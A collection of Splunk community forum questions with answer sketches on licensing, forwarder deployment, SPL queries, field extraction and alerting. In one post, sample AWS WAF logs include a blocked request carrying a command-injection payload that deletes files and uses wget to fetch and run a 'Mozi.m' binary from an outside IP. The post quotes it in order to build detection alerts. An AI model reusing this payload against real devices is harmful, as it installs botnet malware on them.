All Topics

We have a Splunk Enterprise no-enforcement license of 50 GB and two standalone indexers. I want to know whether that 50 GB applies to each indexer or to both combined. My understanding is that the 50 GB license covers the sum of both indexers' usage, not 50 GB per indexer. Please clarify.
Please, can anyone help out with the task below? Any ideas will be fine.

Make sure all the Korea servers have a UF installed and are sending data to EY.NET (deploymentclient.conf):
- Validate whether they are currently sending canvas application logs to Splunk.
- Validate the log paths in the SR against the existing ones in the canvas input apps (EYNET_Canvas*).
- Add additional monitor stanzas to the existing apps if needed.
- Add servers to the serverclass if they are not currently in it.
- Create a deployment plan.
- Raise a CHG request and submit it for CAB review.
- Deploy during the change window, with post-deployment validation of the data.

Any ideas?
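For the monitor-stanza and serverclass steps, a minimal sketch of the deployment-server side (the app name, class name, paths, and hostname pattern here are hypothetical, not from the task):

```ini
# inputs.conf inside the canvas input app pushed by the deployment server
[monitor:///opt/canvas/logs/application*.log]
index = canvas
sourcetype = canvas:application
disabled = false

# serverclass.conf on the deployment server
[serverClass:korea_canvas]
whitelist.0 = kr-*.example.com

[serverClass:korea_canvas:app:EYNET_Canvas_inputs]
restartSplunkd = true
```

After a deployment-server reload, the Korea UFs matching the whitelist pick up the app and its monitor stanzas.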
Hi, can someone please help? How do I get the event count, or the log volume in GB/MB, for a particular sourcetype on an indexer?
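One way to get both the count and a rough volume is to sum the raw event size per sourcetype (the index and sourcetype names below are placeholders; the other common source for volume is license_usage.log in _internal):

```spl
index=your_index sourcetype=your_sourcetype
| eval bytes=len(_raw)
| stats count, sum(bytes) as bytes
| eval MB=round(bytes/1024/1024,2), GB=round(bytes/1024/1024/1024,3)
```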
Hi, my issue is that I have a table like this:

field1   field2
1        0
2        1
2        2
1        0

I want to create a third column that holds a running result:
- first row: field1 - field2 = field3
- each following row: previous row's field3 + this row's field1 - this row's field2 = new field3

Expected result:

field1   field2   field3
1        0        1
2        1        2  (1+2-1)
1        2        1  (2+1-2)
1        0        2  (1+1-0)

Can you help me? Thanks!
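The running total described above (each row adds its own field1 - field2 onto the previous field3) maps directly onto streamstats:

```spl
| eval diff = field1 - field2
| streamstats sum(diff) as field3
| fields - diff
```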
What is the best way to post custom metrics to AppDynamics? If we go with the Machine Agent HTTP Listener, is there any third-party library we can use to talk to the listener instead of calling the REST APIs directly?
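For reference, a sketch of posting directly to the Machine Agent HTTP Listener with curl; this assumes the listener is enabled and running on its default port 8293, and the metric path is an example to adapt (verify the endpoint against your agent version's documentation):

```shell
curl -X POST http://localhost:8293/api/v1/metrics \
  -H "Content-Type: application/json" \
  -d '[{
        "metricName": "Custom Metrics|MyApp|QueueDepth",
        "aggregatorType": "AVERAGE",
        "value": 42
      }]'
```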
Hi, we are moving from a single-instance install to a cluster. The production machine is going to be reused as a search head. Can we delete the data on the search head now that it has been copied to another machine (the new indexer)? Is the below correct to delete for each index, so we keep the index structure on the search head but remove the data, since it's just taking up space?

/splunk/mlc_live/db
/splunk/mlc_live/colddb
/splunk/mlc_live/datamodel_summary

Thanks in advance, Rob
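A sketch of an alternative that avoids deleting bucket directories by hand: splunk clean eventdata removes the indexed data while keeping the index definition and directory structure. Stop Splunk first, and note this is irreversible (the index name follows the paths above):

```shell
$SPLUNK_HOME/bin/splunk stop
$SPLUNK_HOME/bin/splunk clean eventdata -index mlc_live
$SPLUNK_HOME/bin/splunk start
```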
We have alerts set up which trigger an email when a specific device has triggered. This has been working great and has provided good alerting based on the threshold below. The search is:

index=index1 sourcetype="devices" earliest=-24h latest=now
| stats avg(temp) as avg_temp by customer_id
| where avg_temp < 15

However, a customer wants reporting that shows the individual customer/device and how many times it has alerted. Is there any way to report on this, given that scheduler.log doesn't provide this granularity for, say, 3 months of triggered alerts?
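One common workaround is to have the alert search also write its results to a summary index, then report over that history. A sketch (the summary index and source names are hypothetical):

```spl
index=index1 sourcetype="devices" earliest=-24h latest=now
| stats avg(temp) as avg_temp by customer_id
| where avg_temp < 15
| collect index=alert_summary source="low_temp_alert"
```

Reporting over 3 months then becomes:

```spl
index=alert_summary source="low_temp_alert" earliest=-90d
| stats count as times_alerted by customer_id
```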
I am new to Splunk administration. Could someone help with a query that gives both reporting and non-reporting devices in the last hour, and shows both on a pie chart?
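One common pattern is to compare the hosts seen in the last hour against a lookup of all expected devices (the lookup name here is hypothetical; you need such an inventory, since Splunk can't know about devices that have never reported):

```spl
| inputlookup all_devices.csv
| fields host
| join type=left host
    [ | tstats latest(_time) as last_seen where index=* earliest=-1h by host ]
| eval status = if(isnull(last_seen), "non-reporting", "reporting")
| stats count by status
```

Setting the visualization to a pie chart over status then shows both groups.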
Hello, how can I disable indexer discovery from the indexers' side (the ICMP pings to forwarders)? Would I have to create an app to deploy on the indexer cluster containing a restmap.conf in its local folder, with a stanza like this:

[indexer_discovery:indexer_discovery]
disabled = 1

Or is there another way to do it? Thank you for your help.
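For context, indexer discovery is driven by the cluster master and the forwarders rather than by the indexers themselves: the master advertises peers under an [indexer_discovery] stanza in its server.conf, and forwarders opt in via outputs.conf. A sketch of the forwarder side, where removing the indexerDiscovery reference and listing peers explicitly disables the mechanism (all names here are hypothetical):

```ini
# outputs.conf on a forwarder using indexer discovery
[indexer_discovery:cluster1]
master_uri = https://master.example.com:8089

[tcpout:cluster_peers]
indexerDiscovery = cluster1
# To disable discovery, remove indexerDiscovery above and list peers directly:
# server = idx1.example.com:9997, idx2.example.com:9997
```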
Can we take a full backup of the entire var directory on the Splunk indexer machine, assuming we have enough available space?
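If you do back up var with a simple archive, a minimal sketch (stop Splunk first so hot buckets aren't changing mid-copy; paths assume a default install and the backup destination is a placeholder):

```shell
$SPLUNK_HOME/bin/splunk stop
tar -czf /backup/splunk_var_$(date +%F).tar.gz -C $SPLUNK_HOME var
$SPLUNK_HOME/bin/splunk start
```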
Hello, I added a CSV file to Splunk, but the sourcetype name is not correct, and I want to start over.

Now: source="test.csv" sourcetype="csv"
I want: source="test.csv" sourcetype="test"

If I run this query, is it correct?

source="test.csv" sourcetype="csv" | delete

Will it delete the test.csv file? Thanks in advance. Regards, Viat
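For reference, | delete only masks the already-indexed events (it requires a role with the can_delete capability) and never touches the original test.csv on disk. After running it, the file can be re-indexed with the desired sourcetype, for example via the CLI (the path and index here are placeholders):

```shell
$SPLUNK_HOME/bin/splunk add oneshot /path/to/test.csv -sourcetype test -index main
```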
Hi, below are my logs:

2020-10-14 01:59:59,889 INFO [-912674] o.a.n.w.s.AuthenticationFilter Attempting request for (<ppatt2><CN=abcdefg50450.phx.xp.com, OU=Middleware Utilities, L=Phoenix, ST=Arizona, C=US, SERIALNUMBER=188055, OID.1.3.6.1.4.1.311.60.2.1.2=New York, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization>) GET https://abcdefg50449.phx.xp.com:9091/api/flow/bulletin-board (source )

2020-10-14 02:00:32,995 INFO 67995] o.a.n.w.s.NiFiAuthenticationFilter Attempting request for (<vkravic><CN=abcdefg50450.phx.xp.com, OU=Middleware Utilities,  L=Phoenix, ST=Arizona, C=US, SERIALNUMBER=188055, OID.1.3.6.1.4.1.311.60.2.1.2=New York, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization>) POST https://abcdefg50450.phx.xp.com:9091/api/flowfile-queues/5aab3ee9-4bd1-1f35-9756-ed1248dbc67a/listing-requests (source)

I want two regexes for two different fields: one for the user in the first angle brackets (ppatt2, vkravic), as Request User, and one for the HTTP method (GET, POST), as Request Type. Can someone provide regexes for both fields? Thanks in advance.
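Based on the two sample events above, a sketch of the two extractions (the field names RequestUser and RequestType are chosen here for illustration):

```spl
| rex "Attempting request for \(<(?<RequestUser>[^>]+)><"
| rex "\)\s+(?<RequestType>[A-Z]+)\s+https?://"
```

Against the samples, RequestUser comes out as ppatt2 / vkravic and RequestType as GET / POST.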
Requirement 1:
For example, I have a correlation search which generates 2,000 events within 24 hours with the same Title, "Important- Password Expiration Notice".
- I shouldn't have 2,000 notable events created in the Incident Review dashboard; I should have only 1 notable event.
- If the Title is different, then a notable event should be created.
I have tested setting the window duration to 24 hours and "Fields to group by" to the Title field, but it is working incorrectly: it does not generate a notable event even when the Title is different.

Requirement 2:
Is there a way I can update an existing notable event? For example:
Existing notable event Title: Important- Password Expiration Notice
Existing field value: abcuser@company.com
It should append the new value to the existing field:
- abcuser@company.com
- xyzuser@company.com
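For requirement 1, the UI settings described (window duration and "Fields to group by") correspond to the throttling keys in savedsearches.conf on the correlation search; a sketch for comparing against what the UI actually wrote (the stanza name is hypothetical):

```ini
[Important- Password Expiration Notice - Rule]
alert.suppress = 1
alert.suppress.fields = Title
alert.suppress.period = 86400s
```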
Hi, I'm trying to retrieve one example event for each different value of a field, so that I can see the detail of each type of event. So if | stats count by fieldname returns 10 different values for that field, I want to see 10 events in the event view and look at the details of one event per value. Makes sense? Thanks
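One sketch of this, keeping a single example event per value of the field (index and field names are placeholders):

```spl
index=your_index
| dedup fieldname
| table fieldname, _raw
```

Alternatively, | stats latest(_raw) as example by fieldname gives one example per value in table form.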
Hello, we have integrated the AWS WAF logs into Splunk; now we need to monitor SQL Injection and Cross-Site Scripting attacks in Splunk. Can anyone please share a query for setting up alerts for SQL Injection and Cross-Site Scripting, and for raising an incident if either attack happens? Here are sample AWS WAF logs for the ALLOW and BLOCK actions.

action: ALLOW
events: {"timestamp":1602659653929,"formatVersion":1,"webaclId":"ba8f2e58-8d58-42b6-a207-1d3e382db941","terminatingRuleId":"Default_Action","terminatingRuleType":"REGULAR","action":"ALLOW","terminatingRuleMatchDetails":[],"httpSourceName":"ALB","httpSourceId":"110604134217-app/xxxx-PROD-ALB/06b9064d5ca45468","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"xx.xx.xxx.xx","country":"AU","headers":[{"name":"Host","value":"access.xxxxxx.com.in"},{"name":"Sec-WebSocket-Key","value":"LWyNMG9kCDp7z0UOSXpoUQ=="},{"name":"adSsoCookie","value":"O2bbUYoRhXfwrLaeD6j5mDLAG_s.*AAJTSQACMDIAAlNLABxueHBJaFYzYUVxQXg2VEdUS2Q4VllTVkQ2UzQ9AAR0eXBlAANDVFMAAlMxAAIwMQ..*"},{"name":"Sec-WebSocket-Version","value":"13"},{"name":"Sec-WebSocket-Protocol","value":"v1.notifications.xxxxxx.org"}],"uri":"/xxxxxxxx/notifications","args":"","httpVersion":"HTTP/1.1","httpMethod":"GET","requestId":"1-5f86a545-7e0faddd488b61a0746fe97d"}}

action: BLOCK
events: {"timestamp":1602647260818,"formatVersion":1,"webaclId":"ba8f2e58-8d58-42b6-a207-1d3e382db941","terminatingRuleId":"3afb3065-2ef7-41f9-9f29-972876893e09","terminatingRuleType":"REGULAR","action":"BLOCK","terminatingRuleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"QUERY_STRING","matchedData":["next_file","/*;wget http://xxx.xx.xx.xxx:5"]}],"httpSourceName":"ALB","httpSourceId":"110604134217-app/xxxxxxx-PROD-ALB/06b9064d5ca45468","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"xxx.xx.xxx.xxx","country":"CN","headers":[{"name":"Host","value":"xxxxx-prod-alb-1083688078.ap-southeast-2.xxxxx.amazonaws.com"}],"uri":"/sxxxxxxxxxp.cgi","args":"next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://101.67.243.158:50647/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1","httpVersion":"HTTP/1.0","httpMethod":"GET","requestId":"1-5f8674dc-3a3d4032758b8da9064aeffb"}}
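A starting point for the alert search, assuming the WAF events are indexed as the JSON shown so that spath can reach terminatingRuleMatchDetails (the index and sourcetype names are placeholders; field names follow the sample events):

```spl
index=aws_waf sourcetype=aws:waf action=BLOCK
| spath output=attack_type path=terminatingRuleMatchDetails{}.conditionType
| search attack_type IN ("SQL_INJECTION", "XSS")
| stats count by httpRequest.clientIp, attack_type, httpRequest.uri
```

Saved as an alert that triggers when the result count is greater than 0, this covers both attack types; attempts the WAF allowed through can be watched the same way by changing the action filter.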
https://docs.splunk.com/Documentation/Splunk/8.0.6/Indexer/MultisiteSmartStore This document says: "This deployment type is limited to two sites, with each site hosted in an on-premises data center". Why are more than 2 sites not supported for SmartStore? Is it an architectural limitation of Splunk?
Hello, I am developing my own Splunk app for a specific file type. These files are archives with the ".tar.gz" extension whose filenames end with "myapp". I made my own props.conf in my app:

[preprocess-myapparchive]
invalid_cause = archive
is_valid = False
LEARN_MODEL = false

[source::...myapp.tar.gz]
unarchive_cmd = /opt/splunk/etc/apps/myapp/bin/myapp.py
NO_BINARY_CHECK = true
sourcetype = preprocess-myapparchive
priority = 10002

It seems like my [source::...myapp.tar.gz] stanza is never called, because Splunk catches the file as .tar.gz and tries to uncompress the archive. How can I bypass the built-in Splunk configuration for .tar.gz files? My problem is similar to this post: https://community.splunk.com/t5/Getting-Data-In/ArchiveProcessor-Bypassing-normal-system-local-props-conf/m-p/78002#M15965 but the answer provided there doesn't fit my needs, as I can't modify the /system/local/props.conf file...
I have a simple dashboard table where one of the columns is a download link. Is there a way to edit just the XML file of the dashboard to change the text color in that column to blue and also underline it, so that it looks like a download link? Thanks in advance
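One sketch in Simple XML: give the table element an id and inject CSS from a hidden html panel. The id, the column position in nth-child, and the $alwaysHideCSS$ hiding convention are all assumptions to adapt to your dashboard:

```xml
<row depends="$alwaysHideCSS$">
  <panel>
    <html>
      <style>
        #download_table td:nth-child(3),
        #download_table td:nth-child(3) a {
          color: #0066cc;
          text-decoration: underline;
        }
      </style>
    </html>
  </panel>
</row>
```

The matching table element would carry the same id, e.g. <table id="download_table">, with nth-child(3) pointing at the download-link column.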
Dear team, I have the Cloudflare app set up and the index has data. However, when I open the app from the menu, it shows zero results. This is the search from one query:

| tstats count from datamodel=cloudflare.cloudflare where Cloudflare.ClientCountry="*" Cloudflare.ClientDeviceType="*" Cloudflare.dest_ip="*" Cloudflare.dest_host="*" Cloudflare.uri_path="*" Cloudflare.http_user_agent="*" Cloudflare.status="*" Cloudflare.src_ip="" Cloudflare.OriginResponseStatus="200" Cloudflare.RayID="*" Cloudflare.WorkerSubrequest="*" Cloudflare.http_method="*"

The result is 0. However, when I omit the rest and leave only the ClientCountry field, I do get data. My data model is created and has finished accelerating. What is the cause of that?
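To narrow down which filter is dropping everything, one approach is to remove all the filters and group by one suspect field at a time; note also that the search above uses Cloudflare.src_ip="" (which matches only empty values), unlike the "*" used for every other field. A sketch:

```spl
| tstats count from datamodel=cloudflare.cloudflare by Cloudflare.src_ip
```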
Hello, I have this query:

| tstats `summariesonly` values(Authentication.app) as app, count from datamodel=Authentication.Authentication where earliest=-1d by Authentication.action, Authentication.src, index
| `drop_dm_object_name("Authentication")`
| eval success=if(action="success",count,0), failure=if(action="failure",count,0)
| stats values(app) as app, sum(failure) as failure, sum(success) as success by src, index
| where success > 0
| `mltk_apply_upper("app:failures_by_src_count_1d", "medium", "failure")`
| table userPrincipalName, state

1. I need to add the user to the query, but I didn't find a user field in this datamodel (I used | stats dc() as * | transpose). How can I find all the fields in it?
2. Also, it shows the app list plus the numbers of failures and successes, but no correlation of failures/successes to apps. How can I add this?
3. How can I add a failure reason?

Thanks!
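For question 1, a sketch of listing the fields the datamodel actually carries:

```spl
| datamodel Authentication Authentication search
| fieldsummary
| table field
```

Note that the CIM Authentication datamodel does define a user field, so it can be added to the by clause directly; grouping by user and app alongside action (a sketch, assuming the datamodel is populated with those fields) also gives the per-app failure/success correlation asked for in question 2:

```spl
| tstats `summariesonly` count from datamodel=Authentication.Authentication where earliest=-1d
    by Authentication.action, Authentication.src, Authentication.user, Authentication.app, index
```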